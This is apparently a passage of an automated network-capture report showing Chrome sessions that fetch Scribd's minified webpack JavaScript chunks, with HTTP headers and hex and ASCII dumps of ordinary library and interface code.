                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC16384INData Raw: 61 79 5d 22 2c 4c 3d 22 5b 6f 62 6a 65 63 74 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 5d 22 2c 55 3d 22 5b 6f 62 6a 65 63 74 20 55 69 6e 74 31 36 41 72 72 61 79 5d 22 2c 47 3d 22 5b 6f 62 6a 65 63 74 20 55 69 6e 74 33 32 41 72 72 61 79 5d 22 2c 56 3d 2f 5c 62 5f 5f 70 20 5c 2b 3d 20 27 27 3b 2f 67 2c 59 3d 2f 5c 62 28 5f 5f 70 20 5c 2b 3d 29 20 27 27 20 5c 2b 2f 67 2c 71 3d 2f 28 5f 5f 65 5c 28 2e 2a 3f 5c 29 7c 5c 62 5f 5f 74 5c 29 29 20 5c 2b 5c 6e 27 27 3b 2f 67 2c 7a 3d 2f 26 28 3f 3a 61 6d 70 7c 6c 74 7c 67 74 7c 71 75 6f 74 7c 23 33 39 29 3b 2f 67 2c 6a 3d 2f 5b 26 3c 3e 22 27 5d 2f 67 2c 57 3d 52 65 67 45 78 70 28 7a 2e 73 6f 75 72 63 65 29 2c 51 3d 52 65 67 45 78 70 28 6a 2e 73 6f 75 72 63 65 29 2c 4b 3d 2f 3c 25 2d 28 5b 5c 73 5c 53
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ay]",L="[object Uint8ClampedArray]",U="[object Uint16Array]",G="[object Uint32Array]",V=/\b__p \+= '';/g,Y=/\b(__p \+=) '' \+/g,q=/(__e\(.*?\)|\b__t\)) \+\n'';/g,z=/&(?:amp|lt|gt|quot|#39);/g,j=/[&<>"']/g,W=RegExp(z.source),Q=RegExp(j.source),K=/<%-([\s\S
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC16384INData Raw: 6e 20 74 68 69 73 2e 73 69 7a 65 3d 74 2e 73 69 7a 65 2c 6e 7d 2c 48 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 2e 67 65 74 28 65 29 7d 2c 48 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 2e 68 61 73 28 65 29 7d 2c 48 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 3b 69 66 28 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6e 29 7b 76 61 72 20 72 3d 6e 2e 5f 5f 64 61 74 61 5f 5f 3b 69 66 28 21 49 6e 7c 7c 72 2e 6c 65 6e 67 74 68 3c 31 39 39 29 72 65 74 75 72 6e 20 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: n this.size=t.size,n},Hn.prototype.get=function(e){return this.__data__.get(e)},Hn.prototype.has=function(e){return this.__data__.has(e)},Hn.prototype.set=function(e,t){var n=this.__data__;if(n instanceof Wn){var r=n.__data__;if(!In||r.length<199)return r
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC16384INData Raw: 7c 7c 47 6f 28 74 2c 54 65 5b 72 5d 29 26 26 21 78 65 2e 63 61 6c 6c 28 61 2c 72 29 3f 6e 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 24 61 28 74 2c 6e 2c 72 2c 61 2c 69 2c 6f 29 7b 72 65 74 75 72 6e 20 65 73 28 74 29 26 26 65 73 28 6e 29 26 26 28 6f 2e 73 65 74 28 6e 2c 74 29 2c 59 72 28 74 2c 6e 2c 65 2c 24 61 2c 6f 29 2c 6f 2e 64 65 6c 65 74 65 28 6e 29 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 65 69 28 74 29 7b 72 65 74 75 72 6e 20 61 73 28 74 29 3f 65 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 74 69 28 74 2c 6e 2c 72 2c 61 2c 69 2c 6f 29 7b 76 61 72 20 73 3d 31 26 72 2c 6c 3d 74 2e 6c 65 6e 67 74 68 2c 63 3d 6e 2e 6c 65 6e 67 74 68 3b 69 66 28 6c 21 3d 63 26 26 21 28 73 26 26 63 3e 6c 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 75 3d 6f 2e 67 65 74 28 74 29 2c 64 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ||Go(t,Te[r])&&!xe.call(a,r)?n:t}function $a(t,n,r,a,i,o){return es(t)&&es(n)&&(o.set(n,t),Yr(t,n,e,$a,o),o.delete(n)),t}function ei(t){return as(t)?e:t}function ti(t,n,r,a,i,o){var s=1&r,l=t.length,c=n.length;if(l!=c&&!(s&&c>l))return!1;var u=o.get(t),d=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC16384INData Raw: 62 65 28 67 74 28 61 2f 6e 29 29 3b 69 3c 61 3b 29 73 5b 6f 2b 2b 5d 3d 72 61 28 74 2c 69 2c 69 2b 3d 6e 29 3b 72 65 74 75 72 6e 20 73 7d 2c 47 6e 2e 63 6f 6d 70 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 2d 31 2c 6e 3d 6e 75 6c 6c 3d 3d 65 3f 30 3a 65 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 61 3d 5b 5d 3b 2b 2b 74 3c 6e 3b 29 7b 76 61 72 20 69 3d 65 5b 74 5d 3b 69 26 26 28 61 5b 72 2b 2b 5d 3d 69 29 7d 72 65 74 75 72 6e 20 61 7d 2c 47 6e 2e 63 6f 6e 63 61 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 69 66 28 21 65 29 72 65 74 75 72 6e 5b 5d 3b 66 6f 72 28 76 61 72 20 74 3d 62 65 28 65 2d 31 29 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2c 72 3d 65 3b 72 2d 2d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: be(gt(a/n));i<a;)s[o++]=ra(t,i,i+=n);return s},Gn.compact=function(e){for(var t=-1,n=null==e?0:e.length,r=0,a=[];++t<n;){var i=e[t];i&&(a[r++]=i)}return a},Gn.concat=function(){var e=arguments.length;if(!e)return[];for(var t=be(e-1),n=arguments[0],r=e;r--
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:46 UTC16384INData Raw: 49 74 28 5b 22 62 69 6e 64 22 2c 22 62 69 6e 64 4b 65 79 22 2c 22 63 75 72 72 79 22 2c 22 63 75 72 72 79 52 69 67 68 74 22 2c 22 70 61 72 74 69 61 6c 22 2c 22 70 61 72 74 69 61 6c 52 69 67 68 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 47 6e 5b 65 5d 2e 70 6c 61 63 65 68 6f 6c 64 65 72 3d 47 6e 7d 29 29 2c 49 74 28 5b 22 64 72 6f 70 22 2c 22 74 61 6b 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 7a 6e 2e 70 72 6f 74 6f 74 79 70 65 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 3d 72 3d 3d 3d 65 3f 31 3a 5f 6e 28 68 73 28 72 29 2c 30 29 3b 76 61 72 20 61 3d 74 68 69 73 2e 5f 5f 66 69 6c 74 65 72 65 64 5f 5f 26 26 21 6e 3f 6e 65 77 20 7a 6e 28 74 68 69 73 29 3a 74 68 69 73 2e 63 6c 6f 6e 65 28 29 3b 72 65 74 75 72 6e 20 61 2e 5f 5f 66
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: It(["bind","bindKey","curry","curryRight","partial","partialRight"],(function(e){Gn[e].placeholder=Gn})),It(["drop","take"],(function(t,n){zn.prototype[t]=function(r){r=r===e?1:_n(hs(r),0);var a=this.__filtered__&&!n?new zn(this):this.clone();return a.__f
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:46 UTC16384INData Raw: 65 72 54 69 74 6c 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 6f 70 73 2e 74 69 74 6c 65 3f 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 68 32 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 7a 61 2c 22 64 61 74 61 2d 65 32 65 22 3a 22 74 69 74 6c 65 22 7d 2c 74 68 69 73 2e 70 72 6f 70 73 2e 74 69 74 6c 65 29 3a 6e 75 6c 6c 7d 72 65 6e 64 65 72 53 75 62 54 69 74 6c 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 6f 70 73 2e 73 75 62 54 69 74 6c 65 3f 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 73 75 62 5f 74 69 74 6c 65 22 7d 2c 74 68 69 73 2e 70 72 6f 70 73 2e 73 75 62 54 69 74 6c 65 29 3a 6e 75 6c 6c 7d 72 65 6e 64 65 72 28 29 7b 72 65 74 75 72 6e 20 6c 2e 63 72 65 61 74 65 45 6c 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: erTitle(){return this.props.title?l.createElement("h2",{className:za,"data-e2e":"title"},this.props.title):null}renderSubTitle(){return this.props.subTitle?l.createElement("div",{className:"sub_title"},this.props.subTitle):null}render(){return l.createEle
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:46 UTC16384INData Raw: 36 2e 33 38 20 31 2e 38 35 20 31 35 2e 35 32 76 2e 36 35 63 2e 30 31 20 33 2e 35 39 2e 39 32 20 36 2e 34 33 20 32 2e 36 32 20 38 2e 34 34 7a 4d 33 31 2e 33 35 20 32 32 2e 32 32 61 37 2e 31 35 20 37 2e 31 35 20 30 20 30 30 2d 35 2e 34 35 20 32 2e 31 20 37 20 37 20 30 20 30 30 2d 32 20 35 41 36 20 36 20 30 20 30 30 32 35 2e 38 34 20 33 34 20 36 2e 31 31 20 36 2e 31 31 20 30 20 30 30 33 30 20 33 35 2e 37 35 61 39 2e 32 32 20 39 2e 32 32 20 30 20 30 30 31 2e 37 39 2d 2e 32 33 20 37 2e 35 20 37 2e 35 20 30 20 30 31 31 2e 34 33 2d 2e 32 37 71 31 2e 35 39 20 30 20 31 2e 35 39 20 31 2e 39 32 61 36 20 36 20 30 20 30 31 2d 2e 31 35 20 31 2e 33 34 63 2d 31 2e 37 36 20 34 2e 33 32 2d 36 2e 32 39 20 36 2e 38 2d 31 32 2e 38 33 20 36 2e 38 61 32 35 2e 33 37 20 32 35 2e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 6.38 1.85 15.52v.65c.01 3.59.92 6.43 2.62 8.44zM31.35 22.22a7.15 7.15 0 00-5.45 2.1 7 7 0 00-2 5A6 6 0 0025.84 34 6.11 6.11 0 0030 35.75a9.22 9.22 0 001.79-.23 7.5 7.5 0 011.43-.27q1.59 0 1.59 1.92a6 6 0 01-.15 1.34c-1.76 4.32-6.29 6.8-12.83 6.8a25.37 25.
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:46 UTC16384INData Raw: 7c 7c 69 2e 41 2e 74 28 22 73 68 61 72 65 64 2e 63 6f 6d 6d 6f 6e 2e 65 72 72 6f 72 73 2e 63 6f 75 6c 64 5f 6e 6f 74 5f 63 6f 6d 70 6c 65 74 65 5f 72 65 71 75 65 73 74 22 29 2c 6e 3d 65 2e 69 6e 70 75 74 5f 6e 61 6d 65 2c 72 3d 5b 7b 69 6e 70 75 74 3a 6e 2c 6d 65 73 73 61 67 65 3a 74 7d 5d 3b 6e 26 26 28 30 2c 6d 2e 73 78 29 28 6e 69 2e 45 56 45 4e 54 5f 4e 41 4d 45 53 2e 45 52 52 4f 52 2c 74 68 69 73 2e 74 72 61 63 6b 69 6e 67 44 61 74 61 2c 7b 65 72 72 6f 72 5f 74 79 70 65 3a 6e 2c 65 72 72 6f 72 5f 6d 65 73 73 61 67 65 3a 74 7d 29 2c 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 65 72 72 6f 72 73 3a 72 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 7d 29 29 2c 28 30 2c 4c 2e 41 29 28 74 68 69 73 2c 22 68 61 6e 64 6c 65 53 75 63 63 65 73 73 22 2c 28 65 3d 3e 7b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ||i.A.t("shared.common.errors.could_not_complete_request"),n=e.input_name,r=[{input:n,message:t}];n&&(0,m.sx)(ni.EVENT_NAMES.ERROR,this.trackingData,{error_type:n,error_message:t}),this.setState({errors:r,loading:!1})})),(0,L.A)(this,"handleSuccess",(e=>{


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        143192.168.2.1649889151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC697OUTGET /webpack/doc_page/42.4541ec.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Purpose: prefetch
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC580INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1080
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 22 Oct 2024 16:33:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "5526c64ae72ee0563e3e46daad822254"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 894616
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890097-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522385.182344,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1080INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 32 5d 2c 7b 35 32 30 34 32 3a 28 72 2c 65 2c 74 29 3d 3e 7b 74 2e 72 28 65 29 2c 74 2e 64 28 65 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 75 7d 29 3b 76 61 72 20 6e 3d 74 28 33 38 35 34 34 29 2c 61 3d 74 28 39 36 35 34 30 29 2c 6f 3d 74 28 33 37 35 39 34 29 2c 69 3d 74 28 33 31 38 31 35 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 73 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[42],{52042:(r,e,t)=>{t.r(e),t.d(e,{default:()=>u});var n=t(38544),a=t(96540),o=t(37594),i=t(31815);function s(){return s=Object.assign?Object.assign.bind()


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        144192.168.2.1649890151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC698OUTGET /webpack/doc_page/300.b58766.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Purpose: prefetch
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC580INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 4311
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 25 Nov 2024 22:37:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "d2b955297f897dd87cdfb932535d914b"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 182187
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890032-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522385.183046,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 30 30 5d 2c 7b 34 32 33 30 30 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 66 7d 29 3b 76 61 72 20 6e 3d 72 28 33 38 35 34 34 29 2c 61 3d 72 28 32 33 38 30 37 29 2c 73 3d 72 28 34 30 38 38 30 29 2c 6c 3d 72 28 39 36 35 34 30 29 2c 69 3d 72 28 33 38 39 37 39 29 2c 6f 3d 72 28 31 31 38 36 35 29 2c 64 3d 72 28 36 32 38 33 32 29 2c 63 3d 72 2e 6e 28 64 29 3b 63 6c 61 73 73 20 6d 20 65 78 74 65 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[300],{42300:(e,t,r)=>{r.r(t),r.d(t,{default:()=>f});var n=r(38544),a=r(23807),s=r(40880),l=r(96540),i=r(38979),o=r(11865),d=r(62832),c=r.n(d);class m exten
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 74 7d 2c 28 28 29 3d 3e 7b 28 30 2c 6f 2e 6b 68 29 28 61 2e 67 42 2c 74 29 7d 29 29 7d 29 29 2c 75 28 74 68 69 73 2c 22 68 61 6e 64 6c 65 43 61 6e 63 65 6c 42 75 74 74 6f 6e 43 6c 69 63 6b 22 2c 28 65 3d 3e 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 6f 70 73 2e 63 6c 6f 73 65 5f 6d 6f 64 61 6c 28 74 68 69 73 2e 70 72 6f 70 73 2e 69 64 29 7d 29 29 2c 75 28 74 68 69 73 2c 22 68 61 6e 64 6c 65 43 6f 6e 66 69 72 6d 43 6c 69 63 6b 22 2c 28 65 3d 3e 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 6f 70 73 2e 63 6c 6f 73 65 5f 6d 6f 64 61 6c 28 74 68 69 73 2e 70 72 6f 70 73 2e 69 64 29 2c 74 68 69 73 2e 70 72 6f 70 73 2e 6f 6e 43 6f 6e 66 69 72 6d 28 74 68 69 73 2e 70 72 6f 70 73 2e 64 6f 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t},(()=>{(0,o.kh)(a.gB,t)}))})),u(this,"handleCancelButtonClick",(e=>{e.preventDefault(),this.props.close_modal(this.props.id)})),u(this,"handleConfirmClick",(e=>{e.preventDefault(),this.props.close_modal(this.props.id),this.props.onConfirm(this.props.doc
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 4a 52 7d 2c 66 3d 28 30 2c 6e 2e 4e 67 29 28 6e 75 6c 6c 2c 5f 29 28 68 29 7d 2c 35 31 33 33 36 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 6e 3d 72 28 36 32 38 33 32 29 2c 61 3d 72 2e 6e 28 6e 29 2c 73 3d 72 28 39 36 35 34 30 29 2c 6c 3d 72 28 31 31 38 36 35 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 28 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 7c 7c 21 65 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 72 3d 65 5b 53 79 6d 62 6f 6c 2e 74 6f 50 72 69 6d 69 74 69 76 65 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 7b 76 61 72 20 6e 3d 72 2e 63 61 6c 6c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: JR},f=(0,n.Ng)(null,_)(h)},51336:(e,t,r)=>{r.d(t,{A:()=>o});var n=r(62832),a=r.n(n),s=r(96540),l=r(11865);function i(e,t,r){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC177INData Raw: 61 6d 65 3a 74 68 69 73 2e 67 65 74 43 6f 6d 70 6f 6e 65 6e 74 43 6c 61 73 73 6e 61 6d 65 73 28 29 7d 2c 74 68 69 73 2e 67 65 74 4d 6f 64 61 6c 43 6f 6e 74 65 6e 74 28 29 29 7d 7d 6f 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3d 7b 63 6c 6f 73 65 5f 6d 6f 64 61 6c 3a 6c 2e 6c 51 7d 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 63 72 69 62 64 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 64 6f 63 5f 70 61 67 65 2f 33 30 30 2e 62 35 38 37 36 36 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ame:this.getComponentClassnames()},this.getModalContent())}}o.defaultProps={close_modal:l.lQ}}}]);//# sourceMappingURL=https://www.scribd.com/webpack/doc_page/300.b58766.js.map


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        145192.168.2.1649891151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC698OUTGET /webpack/doc_page/214.b28244.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Purpose: prefetch
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC580INHTTP/1.1 200 OK
